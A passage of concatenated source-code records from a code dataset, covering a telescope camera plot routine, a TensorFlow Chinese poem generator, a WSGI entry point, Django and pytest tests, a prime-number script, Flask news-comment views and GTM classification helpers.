leg_h.HexOffPixelHandler(),\n }\n elif isinstance(on_pixels[0], mlp.patches.Rectangle):\n legend_handler_map = {\n leg_h.PixelObject: leg_h.SquarePixelHandler(),\n leg_h.EdgePixelObject: leg_h.SquareEdgePixelHandler(),\n leg_h.OffPixelObject: leg_h.SquareOffPixelHandler(),\n }\n\n if len(off_pixels) > 0:\n legend_objects.append(leg_h.OffPixelObject())\n legend_labels.append(\"Disabled pixel\")\n\n plt.axis(\"equal\")\n plt.grid(True)\n ax.set_axisbelow(True)\n plt.axis(\n [\n min(self._pixels[\"x\"]),\n max(self._pixels[\"x\"]),\n min(self._pixels[\"y\"]) * 1.42,\n max(self._pixels[\"y\"]) * 1.42,\n ]\n )\n plt.xlabel(\"Horizontal scale [cm]\", fontsize=18, labelpad=0)\n plt.ylabel(\"Vertical scale [cm]\", fontsize=18, labelpad=0)\n ax.set_title(\n f\"Pixels layout in {self._telescope_model_name:s} camera\",\n fontsize=15,\n y=1.02,\n )\n plt.tick_params(axis=\"both\", which=\"major\", labelsize=15)\n\n self._plot_axes_def(plt, self._pixels[\"rotate_angle\"])\n description = \"For an observer facing the camera\"\n if camera_in_sky_coor and not is_two_mirror_telescope(self._telescope_model_name):\n description = \"For an observer behind the camera looking through\"\n if is_two_mirror_telescope(self._telescope_model_name):\n description = \"For an observer looking from secondary to camera\"\n ax.text(\n 0.02,\n 0.02,\n description,\n transform=ax.transAxes,\n color=\"black\",\n fontsize=12,\n )\n\n fov, r_edge_avg = self.calc_fov()\n ax.text(\n 0.02,\n 0.96,\n r\"$f_{\\mathrm{eff}}$ = \" + f\"{self._focal_length:.3f} cm\",\n transform=ax.transAxes,\n color=\"black\",\n fontsize=12,\n )\n ax.text(\n 0.02,\n 0.92,\n f\"Avg. edge radius = {r_edge_avg:.3f} cm\",\n transform=ax.transAxes,\n color=\"black\",\n fontsize=12,\n )\n ax.text(\n 0.02,\n 0.88,\n f\"FoV = {fov:.3f} deg\",\n transform=ax.transAxes,\n color=\"black\",\n fontsize=12,\n )\n\n plt.legend(\n legend_objects,\n legend_labels,\n handler_map=legend_handler_map,\n prop={\"size\": 11},\n loc=\"upper right\",\n )\n\n ax.set_aspect(\"equal\", \"datalim\")\n plt.tight_layout()\n\n return fig\n","sub_path":"simtools/model/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":30640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"82830920","text":"# -*- coding: utf-8 -*-\n# file: main.py\n# author: JinTian\n# time: 11/03/2017 9:53 AM\n# Copyright 2017 JinTian. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ------------------------------------------------------------------------\nimport tensorflow as tf\nfrom apps.tensorflow_poems.poems.model import rnn_model\nfrom apps.tensorflow_poems.poems.poems import process_poems\nimport numpy as np\nfrom pypinyin import pinyin, Style\n\nclass Poem(object):\n def __init__(self, s_word):\n self.begin_word = s_word\n self.start_token = 'B'\n self.end_token = 'E'\n self.model_dir = './apps/tensorflow_poems/model/'\n self.corpus_file = './apps/tensorflow_poems/data/poems.txt'\n self.lr = 0.0002\n self.RATE = 0.008\n self.max_len = 78\n self.poems_vector, self.word_int_map, self.vocabs = process_poems(self.corpus_file)\n self.input_data = tf.placeholder(tf.int32, [1, None])\n self.end_points = rnn_model(model='lstm', input_data=self.input_data, output_data=None, vocab_size=len(\n self.vocabs), rnn_size=128, num_layers=2, batch_size=64, learning_rate=self.lr)\n self._parse_input()\n\n def _parse_input(self):\n self.input_word_len = len(self.begin_word)\n #for i in range(self.input_word_len):\n # print(self.begin_word[i])\n\n def _rate_for_tone(self, tdst, tsrc):\n tsrc1 = tsrc[:-1]\n tsrc2 = tsrc[-1:]\n tdst1 = tdst[:-1]\n tdst2 = tdst[-1:]\n add_rate = 0\n if (tsrc1 not in tdst1) and (tdst1 not in tsrc1):\n return 0\n if len(tsrc1) == 1:\n if len(tdst1) == 1:\n add_rate += self.RATE\n if (tsrc2 in tdst2):\n add_rate += self.RATE\n else:\n if len(tdst1) != 1:\n if len(tdst1) == len(tsrc1):\n add_rate += self.RATE\n if (tsrc2 in tdst2):\n add_rate += self.RATE\n return add_rate\n\n def _predict_with_tone(self, predict, tone):\n new_predict = predict\n if tone:\n for i in range(len(self.vocabs)):\n pword = pinyin(self.vocabs[i],style=Style.FINALS_TONE3)[0][0]\n #print(\"%s %s %s, We need %s %s\"%(self.vocabs[i], pword1, pword2, tone1, tone2))\n new_predict[i] += self._rate_for_tone(pword, tone)\n\n return new_predict/np.sum(new_predict)\n def __is_word_define(self, idx):\n if idx < self.input_word_len:\n if self.is_chinese(self.begin_word[idx]):\n return self.begin_word[idx]\n return 0\n\n def to_word_auto(self, idx, predict, tone=None):\n ret = self.__is_word_define(idx)\n if ret:\n return ret\n pdata = np.copy(predict[0])\n #print(predict)\n #print(np.sum(predict))\n #print(len(predict))\n pdata = self._predict_with_tone(pdata, tone)\n #tmp = predict.tolist()\n #pdata /= np.sum(pdata)\n sample = np.random.choice(np.arange(len(pdata)), p=pdata)\n #sample = tmp.index(max(tmp))\n #print(sample)\n if sample > len(self.vocabs):\n return self.vocabs[-1]\n else:\n return self.vocabs[sample]\n\n def to_word_manual(self, idx, predict, tone=None):\n ret = self.__is_word_define(idx)\n if ret:\n return ret\n pdata = np.copy(predict[0])\n #print(predict)\n #print(np.sum(predict))\n #print(len(predict))\n pdata = self._predict_with_tone(pdata, tone)\n most_predict = sorted(pdata)\n most_predict.reverse()\n like_words = \"\"\n valid_idlist = []\n for i in range(10):\n idx = np.where(pdata == most_predict[i])\n idx = list(idx[0])\n if len(idx):\n for i in idx:\n like_words += self._get_word(i)+\"[%d] \"%i\n valid_idlist.append(i)\n print(\"Here is the most likely words:\")\n print(\"%s\"%like_words)\n want_char = input('Please select what you what use number:')\n #tmp = predict.tolist()\n #pdata /= np.sum(pdata)\n if want_char.isdigit():\n want_char = int(want_char)\n if want_char in valid_idlist:\n return self._get_word(want_char)\n elif self.is_chinese(want_char):\n return want_char\n return self._get_word(np.random.choice(np.arange(len(pdata)), p=pdata))\n\n def is_chinese(self, word):\n if word >= u'\\u4e00' and word <= u'\\u9fff':\n return 1\n return 0\n\n def _get_word(self, idx):\n if idx > len(self.vocabs):\n return self.vocabs[-1]\n else:\n return self.vocabs[idx]\n\n\n def gen_poem(self, word_select):\n batch_size = 1\n print('## loading corpus from %s' % self.model_dir)\n\n to_word = word_select\n saver = tf.train.Saver(tf.global_variables())\n init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n with tf.Session() as sess:\n sess.run(init_op)\n\n checkpoint = tf.train.latest_checkpoint(self.model_dir)\n saver.restore(sess, checkpoint)\n\n x = np.array([list(map(self.word_int_map.get, self.start_token))])\n\n [predict, last_state] = sess.run([self.end_points['prediction'], self.end_points['last_state']],\n feed_dict={self.input_data: x})\n word = to_word(0, predict)\n #word = self.begin_word or predict_word\n #print(\"begin_word: %s predict_word: %s select_word: %s\"%(self.begin_word, pword, word))\n poem_ = ''\n\n i = 0\n #print(last_state)\n #for i, (c, h) in enumerate(last_state):\n # print(last_state[i].c)\n # print(last_state[i].h)\n single_len = self.max_len\n tone = None\n plist = []\n while word != self.end_token:\n poem_ += word\n i += 1\n if i > self.max_len:\n break\n x = np.array([[self.word_int_map[word]]])\n [predict, last_state] = sess.run([self.end_points['prediction'], self.end_points['last_state']],\n feed_dict={self.input_data: x, self.end_points['initial_state']: last_state})\n add_tone = tone if (i+2)%single_len == 0 else None\n word = to_word(i, predict, add_tone)\n #print(\"idx[%d, %d], %s %s %s\"%(i, single_len, word, pinyin(word,style=Style.FINALS_TONE3)[0][0], add_tone))\n plist.append(word)\n #print(single_len)\n if (word in ',') and single_len == self.max_len:\n single_len = i+1\n tone = pinyin(plist[i-2],style=Style.FINALS_TONE3)[0][0]\n #print(tone)\n\n return poem_\n\n\n#start_token = 'B'\n#end_token = 'E'\n#model_dir = './model/'\n#corpus_file = './data/poems.txt'\n#\n#lr = 0.0002\n#RATE = 0.008\n#def rate_for_tone(tdst, tsrc):\n# tsrc1 = tsrc[:-1]\n# tsrc2 = tsrc[-1:]\n# tdst1 = tdst[:-1]\n# tdst2 = tdst[-1:]\n# add_rate = 0\n# if (tsrc1 not in tdst1) and (tdst1 not in tsrc1):\n# return 0\n# if len(tsrc1) == 1:\n# if len(tdst1) == 1:\n# add_rate += RATE\n# if (tsrc2 in tdst2):\n# add_rate += RATE\n# else:\n# if len(tdst1) != 1:\n# if len(tdst1) == len(tsrc1):\n# add_rate += RATE\n# if (tsrc2 in tdst2):\n# add_rate += RATE\n# return add_rate\n#\n#def predict_with_tone(predict, vocabs, tone):\n# new_predict = predict\n# if tone:\n# for i in range(len(vocabs)):\n# pword = pinyin(vocabs[i],style=Style.FINALS_TONE3)[0][0]\n# #print(\"%s %s %s, We need %s %s\"%(vocabs[i], pword1, pword2, tone1, tone2))\n# new_predict[i] += rate_for_tone(pword, tone)\n#\n# return new_predict/np.sum(new_predict)\n#\n#def to_word(predict, vocabs, tone=None):\n# pdata = np.copy(predict[0])\n# #print(predict)\n# #print(np.sum(predict))\n# #print(len(predict))\n# pdata = predict_with_tone(pdata, vocabs, tone)\n# #tmp = predict.tolist()\n# #pdata /= np.sum(pdata)\n# sample = np.random.choice(np.arange(len(pdata)), p=pdata)\n# #sample = tmp.index(max(tmp))\n# #print(sample)\n# if sample > len(vocabs):\n# return vocabs[-1]\n# else:\n# return vocabs[sample]\n#\n#\n#def gen_poem(begin_word):\n# batch_size = 1\n# print('## loading corpus from %s' % model_dir)\n# poems_vector, word_int_map, vocabularies = process_poems(corpus_file)\n# #print(poems_vector)\n# #print(word_int_map)\n# input_data = tf.placeholder(tf.int32, [batch_size, None])\n#\n# end_points = rnn_model(model='lstm', input_data=input_data, output_data=None, vocab_size=len(\n# vocabularies), rnn_size=128, num_layers=2, batch_size=64, learning_rate=lr)\n#\n# saver = tf.train.Saver(tf.global_variables())\n# init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n# with tf.Session() as sess:\n# sess.run(init_op)\n#\n# checkpoint = tf.train.latest_checkpoint(model_dir)\n# saver.restore(sess, checkpoint)\n#\n# x = np.array([list(map(word_int_map.get, start_token))])\n#\n# [predict, last_state] = sess.run([end_points['prediction'], end_points['last_state']],\n# feed_dict={input_data: x})\n# word = begin_word or to_word(predict, vocabularies)\n# poem_ = ''\n#\n# i = 0\n# #print(last_state)\n# #for i, (c, h) in enumerate(last_state):\n# # print(last_state[i].c)\n# # print(last_state[i].h)\n# max_len = 78\n# single_len = max_len\n# tone = None\n# plist = []\n# while word != end_token:\n# poem_ += word\n# i += 1\n# if i > max_len:\n# break\n# x = np.array([[word_int_map[word]]])\n# [predict, last_state] = sess.run([end_points['prediction'], end_points['last_state']],\n# feed_dict={input_data: x, end_points['initial_state']: last_state})\n# add_tone = tone if (i+2)%single_len == 0 else None\n# word = to_word(predict, vocabularies, add_tone)\n# print(\"idx[%d, %d], %s %s %s\"%(i, single_len, word, pinyin(word,style=Style.FINALS_TONE3)[0][0], add_tone))\n# plist.append(word)\n# #print(single_len)\n# if (word in ',') and single_len == max_len:\n# single_len = i+1\n# tone = pinyin(plist[i-2],style=Style.FINALS_TONE3)[0][0]\n# #print(tone)\n# return poem_\n#\n#\n#def pretty_print_poem(poem_):\n# print(poem_)\n# print(len(poem_))\n# poem_sentences = poem_.split('。')\n# for s in poem_sentences:\n# if s != '' and len(s) > 10:\n# print(s + '。')\n\nif __name__ == '__main__':\n begin_char = input('## please input the first character:')\n poem = gen_poem(begin_char)\n pretty_print_poem(poem_=poem)\n","sub_path":"apps/tensorflow_poems/compose_poem.py","file_name":"compose_poem.py","file_ext":"py","file_size_in_byte":11725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"521444660","text":"from webob import Request, Response\nimport sys\nimport os\nimport inspect\n\n# make modules are pluggable\nentry_point_path = os.path.split(inspect.getfile(inspect.currentframe()))[0]\ncur_folder = os.path.realpath(os.path.abspath(entry_point_path))\nif cur_folder not in sys.path:\n sys.path.insert(0, cur_folder)\n\n# create configuration object\nfrom conf import Config\nconf = Config()\n\n# include syspath module\nfrom core import syspath\nsyspath = syspath.init_syspath(cur_folder,conf.sitesdir)\n\n\ndef main_index(environ, start_response):\n if environ['mod_wsgi.process_group'] != '':\n import signal, os\n os.kill(os.getpid(), signal.SIGINT)\n req = Request(environ)\n import core.urltool \n site = core.urltool.SiteURLParser(req)\n cursite = site.getCurSite()\n static_dirs = core.urltool.getStaticDirs(cursite)\n spath = False\n filename = req.path_info.split('/')[-1]\n for s_path in static_dirs:\n if(req.path_info.startswith(s_path) and s_path+filename==req.path_info):\n spath = s_path\n break\n if('ajax' in req.POST.keys()):\n func = req.POST['run']\n # run a function from ajax class of current page\n #fid = open(syspath.BASE_PATH+syspath.DS+\"log.txt\", \"a\")\n #print('ajax', file=fid)\n ajax = __import__(syspath.SITES_DIR+'.'+cursite+'.'+cursite+'_ajax',fromlist=[func])\n ajaxFunc = getattr(ajax,func)\n ans = ajaxFunc(req)\n res = Response(ans)\n return res(environ, start_response)\n elif(spath):\n # static files share\n static = core.urltool.StaticURLParser(spath,filename)\n return static(environ, start_response)\n else:\n # site\n from core.htmltool import AddonHelper\n addon = AddonHelper()\n addon.includeSiteAddons(cursite,req)\n return site(environ, start_response)\n\napplication = main_index\n","sub_path":"index.wsgi","file_name":"index.wsgi","file_ext":"wsgi","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"123212465","text":"from django.test import TestCase\nfrom django.urls import reverse\nfrom django.contrib.auth import get_user_model\n\nfrom blog.models import Post\n\n# Create your tests here.\nclass BlogTests(TestCase):\n \n def setUp(self):\n self.user = get_user_model().objects.create_user(\n username='testuser',\n email = 'test@email.com', \n password = 'secret'\n )\n\n self.post = Post.objects.create(\n title='A good title',\n body='Nice body content',\n author=self.user\n )\n \n def test_string_representation(self):\n self.assertEqual(str(self.post), f'{self.post.title}')\n\n def test_post_content(self):\n self.assertEqual(f'{self.post.title}', 'A good title')\n self.assertEqual(f'{self.post.author}', 'testuser')\n self.assertEqual(f'{self.post.body}', 'Nice body content') \n\n def test_post_list_view(self):\n res = self.client.get(reverse('home'))\n self.assertEqual(res.status_code, 200)\n self.assertTemplateUsed(res, 'home.html')\n\n def test_post_detail_view(self):\n res = self.client.get('/post/1/')\n self.assertEqual(res.status_code, 200)\n self.assertTemplateUsed(res, 'post_detail.html')","sub_path":"blog/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"58630576","text":"import pytest\n\nfrom command.extract_dist import to_list\n\n\nclass TestExtractDistribution(object):\n\n @pytest.mark.parametrize(('var', 'expected'), [\n (['pkg'], ['pkg']),\n (None, []),\n ('pkg >= 2.5\\npkg2', ['pkg >= 2.5', 'pkg2']),\n (('pkg'), ['pkg']),\n (('pkg',), ['pkg']),\n ((p for p in ('pkg',)), ['pkg']),\n ])\n def test_list(self, var, expected):\n assert to_list(var) == expected\n","sub_path":"tests/test_extract_distribution.py","file_name":"test_extract_distribution.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"111738511","text":"def pierwsza(liczba):\r\n pomoc=liczba // 2\r\n b = 0\r\n l = 2\r\n while l <= pomoc:\r\n reszta = liczba % l\r\n if reszta == 0:\r\n return False\r\n l = l + 1\r\n return True\r\n \r\n\r\nczyt = 2\r\nlicznik = 0\r\nwhile czyt < 100000:\r\n if \"777\" in str(czyt):\r\n if pierwsza(czyt):\r\n print(czyt)\r\n licznik=licznik + 1\r\n czyt = czyt + 1\r\nprint(\"Liczb szczesliwych jest\", licznik) \r\n \r\n\r\n\r\n","sub_path":"Python/L3/prog3l3.py","file_name":"prog3l3.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"151458461","text":"import logging\n\nfrom flask import abort, jsonify\nfrom flask import g\nfrom flask import render_template\nfrom flask import request\nfrom flask import session\n\nfrom info import constants, db\nfrom info.models import News, User, Comment, CommentLike\nfrom info.utils.common import user_login_info\nfrom info.utils.response_code import RET\nfrom . import news_blu\n\n@news_blu.route('/comment_like',methods=[\"post\"])\n@user_login_info\ndef comment_like():\n user=g.user\n if not user:\n return jsonify(errno=RET.SESSIONERR,errmsg=\"用户未登录\")\n comment_id=request.json.get(\"comment_id\")\n action=request.json.get(\"action\")\n if not all([comment_id,action]):\n return jsonify(errno=RET.PARAMERR,errmsg=\"参数错误\")\n if action not in [\"add\",\"remove\"]:\n return jsonify(errno=RET.PARAMERR,errmsg=\"参数错误\")\n try:\n comment_id=int(comment_id)\n except Exception as e:\n logging.error(e)\n return jsonify(errno=RET.PARAMERR,errmsg=\"参数错误\")\n try:\n comment=Comment.query.get(comment_id)\n except Exception as e:\n logging.error(e)\n return jsonify(errno=RET.PARAMERR,errmsg=\"参数错误\")\n\n if not comment:\n return jsonify(errno=RET.NODATA,errmsg=\"要点赞的评论不存在\")\n comment_like_model=CommentLike.query.filter(CommentLike.comment_id==comment_id,CommentLike.user_id==user.id).first()\n if action==\"add\":\n if not comment_like_model:\n comment_like_model=CommentLike()\n comment_like_model.comment_id=comment_id\n comment_like_model.user_id=user.id\n db.session.add(comment_like_model)\n comment.like_count+=1\n else:\n if comment_like_model:\n db.session.delete(comment_like_model)\n comment.like_count-=1\n try:\n db.session.commit()\n except Exception as e:\n logging.error(e)\n db.session.rollback()\n return jsonify(errno=RET.DBERR,errmsg=\"数据库操作失败\")\n return jsonify(errno=RET.OK,errmsg=\"OK\")\n\n@news_blu.route(\"/news_comment\",methods=[\"post\"])\n@user_login_info\ndef news_comment():\n user=g.user\n if not user:\n return jsonify(errno=RET.SESSIONERR,errmsg=\"用户未登录\")\n #接收参数 news_id comment parent_id\n news_id = request.json.get(\"news_id\")\n print(news_id)\n comment_content = request.json.get(\"comment\")\n parent_id = request.json.get(\"parent_id\")\n print(comment_content)\n # 校验参数\n if not all([news_id,comment_content]):\n return jsonify(errno=RET.PARAMERR,errmsg=\"参数错误\")\n try:\n news_id=int(news_id)\n if parent_id:\n parent_id=int(parent_id)\n except Exception as e:\n logging.error(e)\n return jsonify(errno=RET.PARAMERR,errmsg=\"参数错误\")\n\n # 查询新闻是否存在\n news=None\n try:\n news=News.query.get(news_id)\n except Exception as e:\n logging.error(e)\n return jsonify(errno=RET.DBERR,errmsg=\"数据查询错误\")\n\n if not news:\n return jsonify(errno=RET.NODATA,errmsg=\"查询的新闻不存在\")\n\n #初始化评论模型并添加到数据库\n comment=Comment()\n comment.user_id=user.id\n comment.news_id=news_id\n comment.content=comment_content\n comment.parent_id=parent_id if parent_id else None\n\n try:\n db.session.add(comment)\n db.session.commit()\n except Exception as e:\n db.session.rollback()\n logging.error(e)\n return jsonify(errno=RET.DBERR, errmsg=\"保存评论数据失败\")\n return jsonify(errno=RET.OK, errmsg=\"OK\",data=comment.to_dict())\n\n\n@news_blu.route('/news_collect',methods=[\"post\"])\n@user_login_info\ndef news_collect():\n# # 1.接受参数\n#\n# user = g.user\n# if not user:\n# return jsonify(errno=RET.SESSIONERR,errmsg=\"用户未登录\")\n#\n# news_id=request.json.get(\"news_id\")\n#\n# action=request.json.get(\"action\")\n# # 2.判断参数\n# if not all([news_id,action]):\n# return jsonify(errno=RET.PARAMERR,errmsg=\"参数错误\")\n# if action not in [\"collect\", \"cancel_collect\"]:\n# return jsonify(errno=RET.PARAMERR,errmsg=\"参数错误\")\n# # 3.查询新闻,并判断新闻是否存在\n# try:\n# news=News.query.get(news_id)\n# except Exception as e:\n# logging.error(e)\n# return jsonify(errno=RET.DBERR,errmsg=\"数据查询错误\")\n# if not news:\n# return jsonify(errno=RET.NODATA,errmsg=\"未查询到新闻数据\")\n#\n# if action==\"cancel_collect\":\n# if news in user.collection_news:\n# user.collection_news.remove(news)\n# else:\n# if news not in user.collection_news:\n# user.collection_news.append(news)\n# return jsonify(errno=RET.OK,errmsg=\"OK\")\n#\n #点击收藏按钮时��首先判断用户是否登录\n user=g.user\n if not user:\n return jsonify(errno=RET.SESSIONERR,errmsg=\"用户未登录\") #前端这里应该弹出登录框\n\n #1.接收参数:news_id 和 action\n news_id=request.json.get(\"news_id\")\n action=request.json.get(\"action\")\n #2. 校验参数\n if not all([news_id,action]):\n return jsonify(errno=RET.PARAMERR,errmsg=\"参数错误\")\n if action not in [\"collect\",\"cancel_collect\"]:\n return jsonify(errno=RET.PARAMERR, errmsg=\"参数错误\")\n try:\n news_id=int(news_id)\n except Exception as e:\n logging.error(e)\n return jsonify(errno=RET.PARAMERR,errmsg=\"参数错误\")\n\n #3. 先查询该新闻是否存在,然后根据请求的动作去收藏或取消收藏新闻\n try:\n news=News.query.get(news_id)\n except Exception as e:\n logging.error(e)\n return jsonify(errno=RET.DBERR,errmsg=\"数据查询错误\")\n if not news:\n return jsonify(errno=RET.NODATA,errmsg=\"查询的新闻不存在\")\n\n if action==\"collect\":\n if news not in user.collection_news:\n user.collection_news.append(news)\n else:\n if news in user.collection_news:\n user.collection_news.remove(news)\n #最后返回响应的数据\n return jsonify(errno=RET.OK,errmsg=\"OK\")\n\n@news_blu.route('/')\n@user_login_info\ndef detail(news_id):\n # 查询用户是否登录\n user=g.user\n\n # 查询右侧新闻排行列表\n news_list = list()\n try:\n news_list = News.query.order_by(News.clicks.desc()).limit(constants.CLICK_RANK_MAX_NEWS)\n except Exception as e:\n logging.error(e)\n news_dict_li = list()\n for news in news_list if news_list else []:\n news_dict_li.append(news.to_basic_dict())\n\n #查询具体新闻数据\n news=None\n try:\n news=News.query.get(news_id)\n except Exception as e:\n logging.error(e)\n\n if not news:\n abort(404)\n\n # 更新新闻点击次数\n news.clicks+=1\n # 判断是否收藏该新闻,默认值为 false\n is_collected = False\n # collection_news 后面可以不用加all,因为sqlalchemy会在使用的时候去自动加载\n if user:\n if news in user.collection_news:\n is_collected = True\n\n # 查询并显示评论(评论显示是否点赞)\n #1.查询该新闻的所有评论\n #2.查询当前登录用户点赞的该新闻下的评论id\n #3.给评论添加is_like 属性,默认为Fasle,被点赞的评论is_like=True\n comments=[]\n try:\n\n comments=Comment.query.filter(Comment.news_id==news_id).order_by(Comment.create_time.desc()).all()\n except Exception as e:\n logging.error(e)\n return jsonify(errno=RET.DBERR,errmsg=\"数据查询错误\")\n\n\n comment_ids=[]\n comments_like_ids=[]\n try:\n # 1.查询该新闻的所有评论的id\n comment_ids=[comment.id for comment in comments]\n print(comment_ids)\n # 2.查询当前登录用户点赞的该新闻下的评论\n comments_like=CommentLike.query.filter(CommentLike.comment_id.in_(comment_ids),CommentLike.user_id==user.id).all()\n\n #3.取到被点赞评论的id\n comments_like_ids=[comment_like.comment_id for comment_like in comments_like]\n print(comments_like_ids)\n except Exception as e:\n print(e)\n logging.error(e)\n\n\n comments_dict_li=[]\n for comment in comments:\n comment_dict=comment.to_dict()\n comment_dict[\"is_like\"]=False\n if comment.id in comments_like_ids:\n comment_dict[\"is_like\"]=True\n comments_dict_li.append(comment_dict)\n\n data={\n \"user\": user.to_dict() if user else None,\n \"news_list\": news_dict_li,\n \"news\":news.to_dict(),\n \"is_collected\":is_collected,\n \"comments_dict_li\":comments_dict_li\n }\n return render_template(\"news/detail.html\",data=data)","sub_path":"info/modules/news/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"300470735","text":"from __future__ import print_function\nimport numpy as np\nimport math\nfrom sklearn import neighbors\nfrom sklearn.decomposition import PCA\nfrom sklearn.neighbors import NearestNeighbors\nfrom .ugtm_gtm import initialize\nfrom .ugtm_gtm import optimize\nfrom .ugtm_gtm import projection\nfrom . import ugtm_landscape\nfrom . import ugtm_preprocess\n\n\ndef predictNN(optimizedModel, labels, new_data, modeltype, n_neighbors=1,\n representation=\"modes\", prior=\"equiprobable\"):\n if modeltype == 'regression':\n activityModel = ugtm_landscape.landscape(optimizedModel, labels)\n elif modeltype == 'classification':\n n_neighbors = 1\n activityModel = ugtm_landscape.classMap(optimizedModel,\n labels, prior).activityModel\n projected = projection(optimizedModel, new_data)\n neighborModel = NearestNeighbors(\n n_neighbors=n_neighbors, metric='euclidean')\n fitted = neighborModel.fit(optimizedModel.matX)\n if representation == 'means':\n rep = projected.matMeans\n elif representation == 'modes':\n rep = projected.matModes\n if modeltype == 'regression' and n_neighbors > 1:\n dist, nnID = fitted.kneighbors(rep, return_distance=True)\n dist[dist <= 0] = np.finfo(float).tiny\n predicted = np.average(\n activityModel[nnID], axis=1, weights=1/((dist)**2))\n else:\n nnID = fitted.kneighbors(rep, return_distance=False)\n predicted = activityModel[nnID]\n return predicted\n\n\ndef predictNNSimple(train, test, labels, n_neighbors=1,\n modeltype='regression'):\n if modeltype == 'regression' and n_neighbors > 1:\n neighborModel = NearestNeighbors(\n n_neighbors=n_neighbors, metric='euclidean')\n fitted = neighborModel.fit(train)\n dist, nnID = fitted.kneighbors(test, return_distance=True)\n dist[dist <= 0] = np.finfo(float).tiny\n predicted = np.average(labels[nnID], axis=1, weights=1/((dist)**2))\n\n else:\n clf = neighbors.KNeighborsClassifier(n_neighbors, weights='distance')\n clf.fit(train, labels)\n predicted = clf.predict(test)\n return predicted\n\n\ndef predictBayes(optimizedModel, labels, new_data, prior=\"equiprobable\"):\n activityModel = ugtm_landscape.classMap(optimizedModel,\n labels, prior).nodeClassP\n projected = projection(optimizedModel, new_data).matR\n predicted = np.argmax(np.dot(projected, activityModel), axis=1)\n return predicted\n\n\ndef advancedGTC(train, labels, test, n_neighbors=1, representation=\"modes\",\n niter=200, k=0, m=0, doPCA=False,\n n_components=-1, missing=False,\n missing_strategy='most_frequent', random_state=1234,\n predict_mode=\"bayes\", prior=\"equiprobable\", l=0.1, s=0.3):\n if k <= 0:\n k = int(math.sqrt(5*math.sqrt(train.shape[0])))+2\n if m <= 0:\n m = int(math.sqrt(k))\n if n_components == -1 and doPCA:\n pca = PCA(random_state=random_state)\n pca.fit(train)\n n_components = np.searchsorted(\n pca.explained_variance_ratio_.cumsum(), 0.8)+1\n print(\"Used n_components explaining 80%% of the variance = %s\\n\"\n % n_components)\n if l < 0.0:\n l = 0.1\n if s <= 0.0:\n s = 0.3\n processed = ugtm_preprocess.processTrainTest(train, test, doPCA,\n n_components, missing,\n missing_strategy)\n initialModel = initialize(processed.train, k, m,\n s, random_state=random_state)\n optimizedModel = optimize(processed.train, initialModel, l, niter, 0)\n prediction = advancedPredictBayes(\n optimizedModel, labels, processed.test, prior)\n return prediction\n\n\ndef advancedPredictBayes(optimizedModel, labels,\n new_data, prior=\"equiprobable\"):\n predicted = {}\n cl = ugtm_landscape.classMap(optimizedModel, labels, prior)\n activityModel = cl.nodeClassP\n projected = projection(optimizedModel, new_data)\n predicted[\"optimizedModel\"] = optimizedModel\n predicted[\"indiv_projections\"] = projected\n predicted[\"indiv_probabilities\"] = np.dot(projected.matR, activityModel)\n predicted[\"indiv_predictions\"] = np.argmax(\n predicted[\"indiv_probabilities\"], axis=1)\n predicted[\"group_projections\"] = np.mean(projected.matR, axis=0)\n predicted[\"group_probabilities\"] = np.dot(\n predicted[\"group_projections\"], activityModel)\n predicted[\"uniqClasses\"] = cl.uniqClasses\n return predicted\n\n\ndef printClassPredictions(prediction, output):\n string = \"Classes_in_this_order:\"\n count = 0\n grouproba = prediction[\"group_probabilities\"]\n for i in range(len(prediction[\"uniqClasses\"])):\n string += str(count)+\"=\"+str(prediction[\"uniqClasses\"][i])+\";\"\n count = count + 1\n predvec = [prediction[\"uniqClasses\"][j]\n for j in prediction[\"indiv_predictions\"]]\n np.savetxt(fname=output+\"_indiv_probabilities.csv\",\n X=prediction[\"indiv_probabilities\"],\n delimiter=\",\", header=string, fmt='%.2f')\n np.savetxt(fname=output+\"_indiv_predictions.csv\",\n X=prediction[\"indiv_predictions\"],\n delimiter=\",\", header=string, fmt='%s')\n np.savetxt(fname=output+\"_indiv_predictions_label.csv\",\n X=predvec, delimiter=\",\",\n header=string, fmt='%s')\n np.savetxt(fname=output+\"_group_probabilities.csv\",\n X=grouproba.reshape(1, grouproba.shape[0]),\n delimiter=\",\", header=string, fmt='%.2f')\n print(\"Wrote to disk:\")\n print(\"%s: individual probabilities\" % (output+\"_indiv_probabilities.csv\"))\n print(\"%s: individual predictions\" % (output+\"_indiv_predictions.csv\"))\n print(\"%s: group probabilities\" % (output+\"_group_probabilities.csv\"))\n print(\"\")\n\n\ndef GTC(train, labels, test, k=0, m=0, s=0.3, l=0.1, n_neighbors=1, niter=200,\n representation=\"modes\", doPCA=False, n_components=-1, missing=False,\n missing_strategy='most_frequent', random_state=1234,\n predict_mode=\"bayes\", prior=\"equiprobable\"):\n if k == 0:\n k = int(math.sqrt(5*math.sqrt(train.shape[0])))+2\n if m == 0:\n m = int(math.sqrt(k))\n processed = ugtm_preprocess.processTrainTest(train, test, doPCA,\n n_components, missing,\n missing_strategy)\n initialModel = initialize(processed.train, k, m,\n s, random_state=random_state)\n 